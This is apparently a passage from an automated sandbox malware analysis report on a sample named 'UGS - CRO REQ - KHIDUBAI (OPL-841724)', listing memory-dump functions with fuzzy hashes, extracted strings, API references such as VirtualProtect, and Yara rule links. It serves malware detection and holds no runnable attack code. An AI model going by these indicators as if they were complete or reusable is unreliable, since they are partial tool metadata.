Opcode ID: 541152c236d1675e4cc867ff8b6b11d02ad911ba8913c53808f179cefd70e6d2
Instruction ID: c7fda026ed48ca96b77e6f4c49c531e49dcb5dbd935e675b00851b7c3e56701a
Opcode Fuzzy Hash: 541152c236d1675e4cc867ff8b6b11d02ad911ba8913c53808f179cefd70e6d2
Instruction Fuzzy Hash: 6B312431A042648FC715CF6CD8908AEBFF5EF85311B1544AAE501DB362CA30DE05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0060E328 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

(p, xrefs: 0060E377
Hp, xrefs: 0060E3A3

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$Hp
API String ID: 0-3691929625
Opcode ID: 28b2dda4080f00552a8ee20ded9cbf9067a3e6e11ed58b2b1010504e5e125851
Instruction ID: d8ca604a0c11621d5dcd3e1f1ee47719669e29da884b5d5912bce4720bfb4c8b
Opcode Fuzzy Hash: 28b2dda4080f00552a8ee20ded9cbf9067a3e6e11ed58b2b1010504e5e125851
Instruction Fuzzy Hash: 622102317043445FC706D768E850AAE7FE6AFC630071585AAE509CB3A6DE349D0B87A2

Uniqueness

Uniqueness Score: -1.00%

Function 0061F6B8 Relevance: 2.6, Strings: 2, Instructions: 74COMMON

Download Yara Rule

Strings

(p, xrefs: 0061F72C
(p, xrefs: 0061F758

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$(p
API String ID: 0-216383650
Opcode ID: e7793aafa6fcd34dd0736a0afb2dda99f5fbe8b3566eb0e0614e7ed6b881685d
Instruction ID: dff42571aac500b73a38ff4ca5b138d6510d83fd2d13743db913b55af406242d
Opcode Fuzzy Hash: e7793aafa6fcd34dd0736a0afb2dda99f5fbe8b3566eb0e0614e7ed6b881685d
Instruction Fuzzy Hash: 53113A317042405FC7155768A824BAE3FA6EBC9365F19806AE80DCB386CE399D02C3A2

Uniqueness

Uniqueness Score: -1.00%

Function 00601050 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

,DR, xrefs: 0060106B
,DR, xrefs: 0060108C

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,DR$,DR
API String ID: 0-1276929395
Opcode ID: 9537947b347cf0720ea6ace051dd25e09c68b8bae3ff242e36a1fbd65f746409
Instruction ID: c5126c3b91cfc2186254de500047603063755f6216dbcf16a4d13fe39d8d12a6
Opcode Fuzzy Hash: 9537947b347cf0720ea6ace051dd25e09c68b8bae3ff242e36a1fbd65f746409
Instruction Fuzzy Hash: 8D21D2706003045FCB14EB68E8057AE7FEAEF89300F408939E00AD7696DF749E0A8B91

Uniqueness

Uniqueness Score: -1.00%

Function 00602880 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

8xR, xrefs: 006028D5
8xR, xrefs: 006028C9

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 8xR$8xR
API String ID: 0-3303630891
Opcode ID: f606e5b7da1a57cd79ee0fc08ab2d9cbb746a8d36ad43160e4a26a07e3ba41ff
Instruction ID: eb603373ead61c4b21f857323794db976b48bb671bebf91932c5980745319c08
Opcode Fuzzy Hash: f606e5b7da1a57cd79ee0fc08ab2d9cbb746a8d36ad43160e4a26a07e3ba41ff
Instruction Fuzzy Hash: D111A035B002099FCB68DF699858BAB7BF2EF89300F14402AE505D73C0EA70CD46DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0061D722 Relevance: 2.6, Strings: 2, Instructions: 54COMMON

Download Yara Rule

Strings

DM, xrefs: 0061D7A0
T!M4, xrefs: 0061D77C

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: DM$T!M4
API String ID: 0-2088102914
Opcode ID: b5d8f9f024eac026950866314b2773108168fc7c4a1e1434ee5bba521de9001b
Instruction ID: c3dcb03bacd18db5e6502a31ceb37f8fe0a22af8f5e79eace14384aacad12006
Opcode Fuzzy Hash: b5d8f9f024eac026950866314b2773108168fc7c4a1e1434ee5bba521de9001b
Instruction Fuzzy Hash: BC11C87890920AEFCF15DFA4E4805FC7BF1EF45300B285597C006EB291DB356A86EB56

Uniqueness

Uniqueness Score: -1.00%

Function 0061D730 Relevance: 2.5, Strings: 2, Instructions: 48COMMON

Download Yara Rule

Strings

DM, xrefs: 0061D7A0
T!M4, xrefs: 0061D77C

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: DM$T!M4
API String ID: 0-2088102914
Opcode ID: 869e50f38006beeffb90191f3c3fc0efb0a688a5e1fd7e0d1a49ab2ce9a75dc5
Instruction ID: f34aa5c4fc6efed8bd52c0950a6599e6e7075048bffd5554a42112dec4c46bec
Opcode Fuzzy Hash: 869e50f38006beeffb90191f3c3fc0efb0a688a5e1fd7e0d1a49ab2ce9a75dc5
Instruction Fuzzy Hash: 2201B578D0520EEFCF10DFA5E0401FC77F1EB44300B24A596C00AEB291DA315A86AB52

Uniqueness

Uniqueness Score: -1.00%

Function 00605EC0 Relevance: 2.5, Strings: 2, Instructions: 23COMMON

Download Yara Rule

Strings

8xR, xrefs: 00605EE2
8xR, xrefs: 00605EEE

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 8xR$8xR
API String ID: 0-3303630891
Opcode ID: bbf7eb0247b025dccc1a8a2cfb6fc42cefa4e847718ca2347de83923a44a2c8e
Instruction ID: c6202fd23d5952012f09d7e8051a452e43e360c8219be889538968ee8578b71a
Opcode Fuzzy Hash: bbf7eb0247b025dccc1a8a2cfb6fc42cefa4e847718ca2347de83923a44a2c8e
Instruction Fuzzy Hash: 5DE086313C47145BC72CA568A806B9772CADF4A710F600469A6465B2C1DE71DC01CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00618AF0 Relevance: 1.6, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

(p, xrefs: 00618D80

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: 34bf8e95928d5a2ce01e5888a8194a4997de457017a841e9113466da0b20d00c
Instruction ID: 4f624ee789ce395e25f248a208e12bb5278e570002e1c8eaad3416e006741a59
Opcode Fuzzy Hash: 34bf8e95928d5a2ce01e5888a8194a4997de457017a841e9113466da0b20d00c
Instruction Fuzzy Hash: D4C1D570E047568FCB14CB68D4909EEBBB2BF55314B19859AD456DB3A2CB30EC86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B27FF0 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00B280D6

Memory Dump Source

Source File: 00000002.00000002.420618430.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 692d0f4418e8fee31b23ab0082fdd4565fb28e8d41b8d4c470d376d1dd758a4f
Instruction ID: 14be6b6fd88c61ec7ed19a49c2b7378de821888f91449971e49921de17c3b42f
Opcode Fuzzy Hash: 692d0f4418e8fee31b23ab0082fdd4565fb28e8d41b8d4c470d376d1dd758a4f
Instruction Fuzzy Hash: 3521603000A120CFC7686B64F99C66F7BF1BB81312B2489D2E01F854A5DF758C8DEA26

Uniqueness

Uniqueness Score: -1.00%

Function 00B28000 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00B280D6

Memory Dump Source

Source File: 00000002.00000002.420618430.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 79c02f814a016018d3e8c2916776d31237674ed54f7eac4b352b2a1d04c87841
Instruction ID: 5fd245b89649fc9b7807fe992dc1e4f3ff8a20780d3fe6ea9added690d9f3839
Opcode Fuzzy Hash: 79c02f814a016018d3e8c2916776d31237674ed54f7eac4b352b2a1d04c87841
Instruction Fuzzy Hash: 3711213000A120CFC7686B64F89D62F7AF1FB80312B208991F41F85465DF75989DFA26

Uniqueness

Uniqueness Score: -1.00%

Function 001E91C0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 001E9234

Memory Dump Source

Source File: 00000002.00000002.418758880.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 03a7d84d8f9e5bf7862938d897d0cc3577b6ae2c2f16bf24c1f07cd5de677ea9
Instruction ID: 3c9aa4339c05bd26cca0ee6028c548eec289dee743ac93c1da8f8d9163cb9f17
Opcode Fuzzy Hash: 03a7d84d8f9e5bf7862938d897d0cc3577b6ae2c2f16bf24c1f07cd5de677ea9
Instruction Fuzzy Hash: 6611F4B1D002499FCB10DFAAC884BAEFBF5EF88324F54842AD519A7250C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0060DC00 Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

,p, xrefs: 0060D899

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,p
API String ID: 0-2091407873
Opcode ID: 065d6933208b13e23aad8bdac12460f4e36021581b59de021a4bb6509cdd814d
Instruction ID: 9a9d902891226a8de8428e17ddf020207659b0aa615f716860a12243433f3c4f
Opcode Fuzzy Hash: 065d6933208b13e23aad8bdac12460f4e36021581b59de021a4bb6509cdd814d
Instruction Fuzzy Hash: 4BE1C575A002298FCB68DF68C951BDDBBF2BF88300F1445EAE549A7351DA309E85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04EF61D8 Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

Dp, xrefs: 04EF626D

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Dp
API String ID: 0-2141643023
Opcode ID: 0d5df6cf65fa7518a494a2b8864f248854d5cd6b5ab2a9fa37454347b40fa1ea
Instruction ID: 6196e47109cc0d5b2535b23fbd13c5d1078e4bab04c940c3d021dcd6094daf66
Opcode Fuzzy Hash: 0d5df6cf65fa7518a494a2b8864f248854d5cd6b5ab2a9fa37454347b40fa1ea
Instruction Fuzzy Hash: 29A19D306006109FC718EF79D898A6EBBF2FF89710F158569E5059B3A6CB31ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0060C630 Relevance: 1.5, Strings: 1, Instructions: 228COMMON

Download Yara Rule

Strings

4'p, xrefs: 0060C85A

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 9ba3fd6acd803bb26ce816d04deff95c282f3d1f20480afbad41df19ed571bb0
Instruction ID: 7dec7eedf7a235844327a1f0aa0e4381dd971fac7836adcf5a2e8bad595ff80e
Opcode Fuzzy Hash: 9ba3fd6acd803bb26ce816d04deff95c282f3d1f20480afbad41df19ed571bb0
Instruction Fuzzy Hash: E9A10134A50218DFCB19DFA4D898A9EB7B2FF89310F158259E405AB3A5DB70EC46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00612108 Relevance: 1.4, Strings: 1, Instructions: 190COMMON

Download Yara Rule

Strings

4'p, xrefs: 006122AF

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 894549a401c41b84d7a461a0764c8e2abfae52e863839e37b17a09127adc986b
Instruction ID: 507b81d20561afec152dd790126306838f2d9e8c99157ce36f67c94543f0e07f
Opcode Fuzzy Hash: 894549a401c41b84d7a461a0764c8e2abfae52e863839e37b17a09127adc986b
Instruction Fuzzy Hash: 01710C747006168FDB08EF68C894AAE77F6BF89310B1580A9E905DB3B5DB71ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00601301 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

pp, xrefs: 006013C0

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: pp
API String ID: 0-2116140168
Opcode ID: 1f3cf64d7dca5386532df9b74faa8019d15eca113167f20bf48ba804173e9205
Instruction ID: 6ba63d58e67f732fefde2645f87cfd4d97965f908b711f8f3f649ede91c976a6
Opcode Fuzzy Hash: 1f3cf64d7dca5386532df9b74faa8019d15eca113167f20bf48ba804173e9205
Instruction Fuzzy Hash: D9515E76600100AFCB4A9FA8D815D697FB3EF8931471A80D9E2099B372DA32DC12DB51

Uniqueness

Uniqueness Score: -1.00%

Function 006026D0 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

(p, xrefs: 00602744

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: 77cc5a867cbd49f7588f39eb06673d396f6a960e320553b6cc550c81a3e5bce2
Instruction ID: 608d7823203026d6b088ff0700d46acd4c1c480a958b15135fc2f8069ae7ab73
Opcode Fuzzy Hash: 77cc5a867cbd49f7588f39eb06673d396f6a960e320553b6cc550c81a3e5bce2
Instruction Fuzzy Hash: 4D51E535A006568FCB14DF58C4949AAFBB2FF85320B15C69AD915EB382C730EC56CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00603EC0 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

,p, xrefs: 00603F23

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,p
API String ID: 0-2091407873
Opcode ID: 1a91468bf804e54342843bf76e1d46b9b715704daa7896e716f10d4a16231574
Instruction ID: 8eeb083414a9adb74561bdf55d2c376911df2e27dd07d489f9d7de217f03da1e
Opcode Fuzzy Hash: 1a91468bf804e54342843bf76e1d46b9b715704daa7896e716f10d4a16231574
Instruction Fuzzy Hash: 9A51B3357001118FCB19DF69D490AAEBBF6EF89311B15806AEA05DF3A6CB31DD02CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00616B38 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

4F], xrefs: 00616BAA

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4F]
API String ID: 0-1876578708
Opcode ID: 47639fe9248c9ab20803173ee331f4aeeda27a5c0d372100ae958838d1b82dd6
Instruction ID: 0d187e54e7bc0b9ab4a320247b832af56afad0b919a45e5e377a93819c34d763
Opcode Fuzzy Hash: 47639fe9248c9ab20803173ee331f4aeeda27a5c0d372100ae958838d1b82dd6
Instruction Fuzzy Hash: A951A1747052008FC715EB69E4497EAB7F3EB85300F19C56AE4058B389DB34AE8ACBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00610040 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4'p, xrefs: 0061007A

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 74c09f303e73c67ba1dd4e8f3a7fb2c03002ab7c35fc2e9f7a78031b09cd640f
Instruction ID: bb23f8fb9e450bd596f0115348e2cca87887985aff7b17e226787f9abd6b9eb1
Opcode Fuzzy Hash: 74c09f303e73c67ba1dd4e8f3a7fb2c03002ab7c35fc2e9f7a78031b09cd640f
Instruction Fuzzy Hash: FF4194307506148FDB48AB68C855AAFB7B7EFC9710F10811EE406AB3E5CF749C468B95

Uniqueness

Uniqueness Score: -1.00%

Function 04EFB6B8 Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

Tep, xrefs: 04EFB726

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Tep
API String ID: 0-914316021
Opcode ID: db1461d59b9f88bc61673cec733f6bc58c6872734211d83598d852288b7d261c
Instruction ID: 050da4d1a0807664d01ac1f991f237abebeef6003f92257e0daf844c6232ad82
Opcode Fuzzy Hash: db1461d59b9f88bc61673cec733f6bc58c6872734211d83598d852288b7d261c
Instruction Fuzzy Hash: 2341C330B04105CFEB049F66EC197AEB3B3EFC8315F64D465D6029B298DB74B9858B81

Uniqueness

Uniqueness Score: -1.00%

Function 0061FDA0 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

LRp, xrefs: 0061FE59

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: LRp
API String ID: 0-3405495957
Opcode ID: 7a4da0917887c8536640729b081b85ed43e50d155e615030aa4639ba960eea83
Instruction ID: 8dbbd417283c5ee54d1ca515be9beaae0becac3e4274379d6873560998a87466
Opcode Fuzzy Hash: 7a4da0917887c8536640729b081b85ed43e50d155e615030aa4639ba960eea83
Instruction Fuzzy Hash: DC41E571604300DFC7059F64D895BAA7BB2FF85300F288879D50ADF2A6DB709C86CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00616B0F Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

4F], xrefs: 00616BAA

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4F]
API String ID: 0-1876578708
Opcode ID: 04c9f93037a94b32bd58c5af0f557f47b370e52448bd705eb6607e3258a5b41c
Instruction ID: 20653af72a7d77ccf9195d9127058788bef626c0ab29aaf1380c0e53a9cd467c
Opcode Fuzzy Hash: 04c9f93037a94b32bd58c5af0f557f47b370e52448bd705eb6607e3258a5b41c
Instruction Fuzzy Hash: B5419175A083408FC706EB25E4857DA7BB3EF85310F1DC56AD0058B359D735A98ACBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00613D90 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

4'p, xrefs: 00613E46

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 5551c992ca1f97e92c81697b2db1dd1f8a50f8592e1b399a869427cb4bb5d73a
Instruction ID: 5265bb39139a1568acab1a9295e08d1eef95f1247bbe97add788c0e80a066617
Opcode Fuzzy Hash: 5551c992ca1f97e92c81697b2db1dd1f8a50f8592e1b399a869427cb4bb5d73a
Instruction Fuzzy Hash: 72416D313406105FD318DB28C865F6B7BA6AFC9704F244169E60ACB3E6CE71EC42C790

Uniqueness

Uniqueness Score: -1.00%

Function 004F1417 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

4'p, xrefs: 004F241D

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 9d2a10539a8f8311939f8acb365b60a74078b6e5c8df1db4dcdbee8c46f1b449
Instruction ID: 04f597a85271e5f20426f022a205d5a744186c126d853ec312cc2c326ac1a265
Opcode Fuzzy Hash: 9d2a10539a8f8311939f8acb365b60a74078b6e5c8df1db4dcdbee8c46f1b449
Instruction Fuzzy Hash: E331D47190D3999FC7134B259C146BA7F70EF87710F1901DBD541EB6E2C6680C0AC766

Uniqueness

Uniqueness Score: -1.00%

Function 00613DA0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'p, xrefs: 00613E46

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 3e174ba99a568e1579eab3351664fc3218c2f2801f1bdcbd4264cd42cf9919e4
Instruction ID: 40422017760a567eb1933acf927f446a23e61ad4d1c437ba02802a97644fc3cd
Opcode Fuzzy Hash: 3e174ba99a568e1579eab3351664fc3218c2f2801f1bdcbd4264cd42cf9919e4
Instruction Fuzzy Hash: 12314D353406109FD358EB29C865F6B77E6AFC8704F144169E60A8B3E6CE71ED42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0060F4F0 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

Hp, xrefs: 0060F584

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: Hp
API String ID: 0-671740992
Opcode ID: c0ae67f05af8886f257fc7a977005d4b40da385d28faba542bb1c6b2e606ee9b
Instruction ID: 5c2428d20e95ac3cd69d02b62fbdb66658c8c707c5ae3dd93944dfb988dc6b31
Opcode Fuzzy Hash: c0ae67f05af8886f257fc7a977005d4b40da385d28faba542bb1c6b2e606ee9b
Instruction Fuzzy Hash: 5331A1347047508FC729DF68D85496A7BF2EF8A704B1584AAE505DB3A6CB30EC06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0060BAB0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

4'p, xrefs: 0060BAF9

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 52b0f50c913b8ce864772278d415e7936562c5c3b01ccf5f7920a6237dc4d041
Instruction ID: fcb707670867f216971ef7298c75f424f46f9365a40d7b98af8116cf83710fe9
Opcode Fuzzy Hash: 52b0f50c913b8ce864772278d415e7936562c5c3b01ccf5f7920a6237dc4d041
Instruction Fuzzy Hash: F53180316002049FCF198FA4D854A9EBBB2FF89310F1550AAEA0A9B3A5CB71DC56CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00606610 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

p<p, xrefs: 0060665A

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: p<p
API String ID: 0-2671882351
Opcode ID: e9f2b76b58bac6c0fccc4ca26da5f4be04721a380e49e9ce1b07e45d9a1460fb
Instruction ID: b5728053e8a5e32da8459daaea5a4237ea98f8e5c446538df1b0a8be917faaab
Opcode Fuzzy Hash: e9f2b76b58bac6c0fccc4ca26da5f4be04721a380e49e9ce1b07e45d9a1460fb
Instruction Fuzzy Hash: 5631C2712442849FCB16CF29C8909EB7FF6AF4A314F190096F855CB3A2CA36DC52CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004F682F Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4'p, xrefs: 004F6998

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 02854970336768e3093bf5e9329cdef9c9eaa11fc3fdad9b60044679d9f18c21
Instruction ID: dae5acb2dd8fa7645e001cc3d6bf74fc88c0d8ecc955b732e2d67fbbb5ba2f40
Opcode Fuzzy Hash: 02854970336768e3093bf5e9329cdef9c9eaa11fc3fdad9b60044679d9f18c21
Instruction Fuzzy Hash: 8E2176307063584BC716766684606BFA797DFC2754B1A467FD209DB386CEB88C4683CE

Uniqueness

Uniqueness Score: -1.00%

Function 007D1119 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

TJp, xrefs: 007D1146

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: TJp
